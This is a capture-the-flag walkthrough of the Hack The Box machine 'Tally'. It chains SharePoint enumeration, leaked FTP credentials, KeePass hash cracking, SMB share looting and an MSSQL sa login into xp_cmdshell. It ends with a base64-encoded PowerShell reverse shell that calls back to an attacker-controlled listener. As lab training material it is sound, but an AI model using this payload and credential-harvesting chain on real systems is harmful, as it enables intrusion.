Tally HTB

IP

10.10.10.59

Nmap initial scan

sudo nmap -sV -sC -A -oA nmap/inital_nmap 10.10.10.59

full Nmap scan

nmap -sV -p- -oA nmap/full_scan 10.10.10.59

  • While we wait for the full scan to be complete lets start our enumeration process

Nmap initial results

sudo nmap -sV -sC -A -oA nmap/inital_nmap 10.10.10.59
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 04:21 EDT
Nmap scan report for 10.10.10.59
Host is up (0.036s latency).
Not shown: 992 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
|_http-generator: Microsoft SharePoint
|_http-server-header: Microsoft-IIS/10.0
81/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp  open  ccproxy-http?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.10.59:1433: 
|     Target_Name: TALLY
|     NetBIOS_Domain_Name: TALLY
|     NetBIOS_Computer_Name: TALLY
|     DNS_Domain_Name: TALLY
|     DNS_Computer_Name: TALLY
|_    Product_Version: 10.0.14393
|_ssl-date: 2023-08-15T08:21:41+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-08-15T08:17:32
|_Not valid after:  2053-08-15T08:17:32
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=8/15%OT=21%CT=1%CU=30638%PV=Y%DS=2%DC=T%G=Y%TM=64DB359
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=
OS:A)SEQ(SP=106%GCD=3%ISR=109%TI=I%CI=I%II=I%SS=S%TS=A)OPS(O1=M53ANW8ST11%O
OS:2=M53ANW8ST11%O3=M53ANW8NNT11%O4=M53ANW8ST11%O5=M53ANW8ST11%O6=M53AST11)
OS:WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=
OS:2000%O=M53ANW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%
OS:DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%
OS:O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=
OS:)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-08-15T08:21:37
|_  start_date: 2023-08-15T08:17:13

TRACEROUTE (using port 23/tcp)
HOP RTT      ADDRESS
1   50.12 ms 10.10.16.1
2   24.24 ms 10.10.10.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.82 seconds

Ports

21: FTP

  • anonymous login disabled

80:HTTP

  • The main page looks to be Microsoft SharePoint

81:HTTP

  • cant access invalid hostname

135:RPC

139:netbios-ssn

445:SMB

  • anonymous login is disabled

808: Possibly HTTP

1433:ms-sql-s Microsoft SQL Server 2016

Port 80 HTTP

when first landing on the web server we can see that the application utilises Microsoft share point

Not much we can do on this page without credentials, it's worth noting that within the URL bar we can see the following

http://10.10.10.59/_layouts/15/start.aspx#/default.aspx

When looking at the URL bar take notice of the /_layouts/15/start.aspx

  • /_layouts : is a standard SharePoint directory used for system-level pages and functionality

  • /15 in the path refers to the version of Sharepoint (Sharepoint 2013)

  • /start.aspx this serves as the default entry point into the SharePoint site

With this knowledge, it would be a good presumption to start a directory busting from the http://10.10.10.59/_layouts/15 with a specific SharePoint wordlist (seclists)

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/sharepoint-ennumeration.txt -u http://10.10.10.59/_layouts/15 -o dirs_2.txt

within the results, we do find a 

http://10.10.10.59/_layouts/15/viewlsts.aspx

Very interesting if we click on the documents we can see a word file ftp-details modified by tally\adminstrator

Let's download it to our local host and view the contents

we can use libreoffice to open the word document

libreoffice ftp-details.docx

we can see the following

we can find a password

UTDRSCH53c"$6hys

we dont have a username tho let's go back to 

http://10.10.10.59/_layouts/15/viewlsts.aspx

and view the site pages

When you click on the site pages you'll notice you head back to the home menu, but to navigate to the actual site pages we need to remove the following in the URL

so our URL should consist of the following

http://10.10.10.59/SitePages/Forms/AllPages.aspx

Now the most likely reason why we are redirected back to the home page is that SharePoint often employs redirection and URL rewriting to ensure consistency and proper navigation for the users, but for us that's not the case.

alright within the Site Pages, we can see the following

when we are redirected to /SitePages/FinanceTeam.aspx we can see some juicy information

from what we can gather we found the users

Rahul
Sarah
Tim
ftp_user

From the message we can safely say we found the user for the FTP pass we found earlier

ftp_user: UTDRSCH53c"$6hys

FTP

once we log in via FTP

ftp ftp_user@10.10.10.59

Looking within the user directories we can see a number of users

Administrator
Ekta
Jess
Paul
Rahul
Sarah
Stuart
Tim
Yenwi

Let's download the data from the FTP server onto our local machine using wget

wget -r 'ftp://ftp_user:UTDRSCH53c"$6hys@10.10.10.59'

if we look within the

/10.10.10.59/User/Sarah

we will find notes.txt which contains the following

done

install Sharepoint, replace Orchard CMS

to do

uninstall SQL Server 2016

  • from what we can tell, Orchard CMS was replaced with SharePoint

When we look in the /10.10.10.59/Intranet/Binaries

we can see a Firefox executable

'Firefox Setup 44.0.2.exe'

we can use searchsploit to see if this version of Firefox is vulnerable, which indeed it is

  • we will keep this in our back pocket

If we also look at

/10.10.10.59/User/Tim/Files

we will find a tim.kdbx file which is a keepass database that could possibly contain passwords

When we try to open the database we are prompted for the Master Password

What we can do is use keepass2john to create a hash of the master password and use hashcat to crack it

  1. using keepass2john

keepass2john tim.kdbx > /home/kali/Desktop/OSCP_MACHINES/windows/tally/tim.kdbx.hash

  1. use hashcat to crack the hash

hashcat -m 13400 tim.kdbx.hash --user /usr/share/wordlists/rockyou.txt

  1. We now have the master key 

simplementeyo

Now we can open the keepass database

looking through the database we do find credentials relating to a smb share 

TALLY ACCT share: Finance: Acc0unting

SMB

Let's view what shares are present and the privilege associated with them 

smbmap -u Finance -p Acc0unting -H 10.10.10.59

we can see we have READ access to the ACCT Share lets mount to the share and enumerate the contents 

sudo mount -t cifs -o user=Finance,pass=Acc0unting //10.10.10.59/ACCT /mnt
cd /mnt

initially tried to find any file that may be on the share resulting a lot of junk files 

find . -type f

we saw early in our Nmap scan there was a Microsoft SQL Server 2016, lets refine our search

find . | grep SQL

we do find the following

looking in the conn-info.txt we can see a set of credentials 

old server details

db: sa
pass: YE%TJC%&HYbe5Nw

have changed for tally

  • nothing old credentials

Let's look for txt files and see if anything comes up

  • also, note if we can recall with the user Sarah's directory that Orchard is no longer present on the system, meaning any files related to Orchard should not be relevant to our search.

find . -type f | grep txt | grep -v Orchard

  • nothing to interesting

let's look for executables

find . -type f | grep exe | grep -v Orchard

Looking through the executables on the share, we can see the highlighted above, tester.exe doesnt sound like your ordinary executable lets investigate the executable using strings 

strings tester.exe > tester_output.txt
vi tester_output.txt

within the output we can see a particular line of strings

we found a connection string for the SQL server

DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;

Shell as sarah via MSSQL

We can use the mssqlclient.py (part of impacket) 

mssqlclient.py sa:GWE3V65#6KFH93@4GWTG2G@10.10.10.59

typing help shows us we can run commands through a xp_cmdshell

but first, we need to enable xp_cmdshell

enable_xp_cmdshell
xp_cmdshell whoami

running dir we can see we are in the system32 directory

Lets start to establish our reverse shell on the system, we will use https://www.revshells.com/

  1. we will use a PowerShell reverse shell

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

  1. start a netcat listener

rlwrap -cAr nc -lvnp 443

  1. run our Powershell command

we now have a shell as Sarah

PreviousSizzle HTBNextBart HTB

Last updated